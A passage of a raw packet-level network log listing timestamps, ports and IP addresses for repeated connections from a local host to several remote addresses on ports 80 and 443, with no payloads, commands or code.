Oct 22, 2024 16:04:18.168721914 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.168759108 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.168762922 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.168798923 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.169234991 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.169291973 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.169297934 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.169341087 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.169344902 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.169385910 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.169389963 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.169435024 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.169687986 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.169727087 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.169743061 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.169779062 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.169785023 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.169827938 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.169833899 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.169872046 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.169888973 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.169926882 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.169930935 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.169966936 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.170006990 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.170042992 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.170584917 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.170635939 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.170641899 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.170685053 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.170690060 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.170733929 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.170965910 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.171009064 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.171026945 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.171066046 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.171780109 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.171825886 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.171832085 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.171869993 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.173998117 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.174057007 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.174063921 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.174103975 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.176069975 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.176131964 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.176137924 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.176178932 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.180660009 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.180720091 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.180727959 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.180777073 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.181559086 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.181608915 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.181613922 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.181655884 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.183769941 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.183830023 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.183836937 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.183877945 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.185708046 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.185760021 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.185765982 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.185805082 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.187896967 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.187979937 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.187999010 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.188045025 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.189482927 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.189551115 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.189558983 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.189598083 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.191308975 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.191394091 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.191400051 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.191435099 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.193331957 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.193382025 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.193388939 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.193424940 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.195111990 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.195168018 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.195174932 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.195209026 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.196928978 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.196983099 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.196991920 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.197022915 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.199018955 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.199093103 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.199116945 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.199162960 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.200634956 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.200700998 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.200725079 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.200778008 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.202397108 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.202464104 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.202478886 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.202527046 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.215329885 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.215476036 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:18.215543985 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:18.460906982 CEST | 49711 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:18.466300011 CEST | 80 | 49711 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:18.466413975 CEST | 49711 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:18.466597080 CEST | 49711 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:18.471919060 CEST | 80 | 49711 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:19.138335943 CEST | 80 | 49711 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:19.142839909 CEST | 49711 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:19.148220062 CEST | 80 | 49711 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:19.301644087 CEST | 80 | 49711 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:19.358398914 CEST | 49711 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:19.800456047 CEST | 49712 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:19.800501108 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:19.800569057 CEST | 49712 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:19.802503109 CEST | 49712 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:19.802522898 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:20.428121090 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:20.428297997 CEST | 49712 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:20.431576014 CEST | 49712 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:20.431587934 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:20.431973934 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:20.435756922 CEST | 49712 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:20.479377031 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:20.586904049 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:20.587133884 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:20.587224960 CEST | 49712 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:20.592607975 CEST | 49712 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:20.598944902 CEST | 49711 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:20.604583979 CEST | 80 | 49711 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:20.758388996 CEST | 80 | 49711 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:20.762573004 CEST | 49713 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:20.762617111 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:20.762960911 CEST | 49713 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:20.762960911 CEST | 49713 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:20.763005018 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:20.811575890 CEST | 49711 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:21.371479034 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:21.373570919 CEST | 49713 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:21.373591900 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:21.520222902 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:21.520347118 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:21.520410061 CEST | 49713 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:21.521186113 CEST | 49713 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:21.524225950 CEST | 49711 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:21.525346041 CEST | 49714 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:21.529947042 CEST | 80 | 49711 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:21.530145884 CEST | 49711 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:21.530708075 CEST | 80 | 49714 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:21.530924082 CEST | 49714 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:21.530924082 CEST | 49714 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:21.536267042 CEST | 80 | 49714 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:22.201797009 CEST | 80 | 49714 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:22.204072952 CEST | 49715 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:22.204101086 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:22.204149961 CEST | 49715 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:22.204593897 CEST | 49715 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:22.204612017 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:22.249021053 CEST | 49714 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:22.811554909 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:22.813014030 CEST | 49715 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:22.813045979 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:22.954464912 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:22.954565048 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:22.954643011 CEST | 49715 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:22.955120087 CEST | 49715 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:22.959446907 CEST | 49716 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:22.964894056 CEST | 80 | 49716 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:22.965044022 CEST | 49716 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:22.965133905 CEST | 49716 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:22.970586061 CEST | 80 | 49716 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:23.627620935 CEST | 80 | 49716 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:23.628845930 CEST | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:23.628889084 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:23.628971100 CEST | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:23.629194975 CEST | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:23.629205942 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:23.670921087 CEST | 49716 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:24.236854076 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:24.238507032 CEST | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:24.238544941 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:24.382797003 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:24.382924080 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:24.382989883 CEST | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:24.383486986 CEST | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:24.387118101 CEST | 49716 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:24.388328075 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:24.392925978 CEST | 80 | 49716 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:24.393023968 CEST | 49716 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:24.393682957 CEST | 80 | 49718 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:24.393773079 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:24.393897057 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:24.399233103 CEST | 80 | 49718 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:25.238945007 CEST | 80 | 49718 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:25.241086960 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:25.241153002 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:25.241211891 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:25.241617918 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:25.241631031 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:25.291538000 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:25.880044937 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:25.882128954 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:25.882164001 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:26.027864933 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:26.027971983 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:26.028069973 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:26.028506994 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:26.032098055 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:26.033636093 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:26.038079023 CEST | 80 | 49718 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:26.038181067 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:26.039117098 CEST | 80 | 49720 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:26.039199114 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:26.039328098 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:26.044672966 CEST | 80 | 49720 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:26.703584909 CEST | 80 | 49720 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:26.704999924 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:26.705060959 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:26.705173969 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:26.705416918 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:26.705426931 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:26.749053001 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.320470095 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:27.321974993 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:27.322007895 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:27.464806080 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:27.464920044 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:27.464975119 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:27.465465069 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:27.468904018 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.469589949 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.474997044 CEST | 80 | 49722 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:27.475188017 CEST | 80 | 49720 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:27.475234985 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.475265980 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.475423098 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.484105110 CEST | 80 | 49722 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:28.137046099 CEST | 80 | 49722 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:28.140610933 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.140664101 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.140749931 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.146194935 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.146209002 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.186511040 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.762384892 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.763837099 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.763866901 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.905388117 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.905505896 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.905570030 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.906043053 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.909512043 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.910737991 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.915617943 CEST | 80 | 49722 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:28.915720940 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.916182041 CEST | 80 | 49724 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:28.916289091 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.916474104 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.921853065 CEST | 80 | 49724 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:29.574677944 CEST | 80 | 49724 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:29.576064110 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:29.576108932 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:29.576216936 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:29.576499939 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:29.576510906 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:29.624943018 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.173655987 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:30.175339937 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:30.175385952 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:30.315337896 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:30.315428972 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:30.315509081 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:30.315964937 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:30.319032907 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.319777012 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.324909925 CEST | 80 | 49724 | 193.122.130.0 | 192.168.2.10 |
